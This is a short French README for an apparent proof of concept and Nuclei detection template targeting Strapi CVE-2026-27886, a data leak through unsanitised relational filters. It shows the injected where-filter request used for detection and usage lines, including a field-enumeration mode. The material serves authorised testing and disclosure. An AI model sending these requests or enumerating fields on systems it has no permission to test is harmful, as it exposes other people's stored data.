
Strapi CVE-2026-27886. Fuite de données sensibles via le filtrage relationnel en raison d'un manque de désinfection des requêtes.
Pour tests de sécurité autorisés uniquement.
Comprend :
CVE-2026-27886.py - PoC PythonCVE-2026-27886.yaml - Modèle Nuclei pour la détectionLe vérificateur envoie deux requêtes à un endpoint public de collection de l'API de contenu Strapi :
GET /api/<collection>
GET /api/<collection>?where[id][$lt]=-1
Si la réponse de référence contient des enregistrements et que le prédicat where faux réduit le jeu de résultats à zéro, l'endpoint est probablement vulnérable.
Vérification sûre :
python3 CVE-2026-27886.py http://strapi/api/articles
Énumération des champs :
python3 CVE-2026-27886.py http://strapi/api/articles --enum-fields
nuclei -t CVE-2026-27886.yaml -u http://strapi/api/articles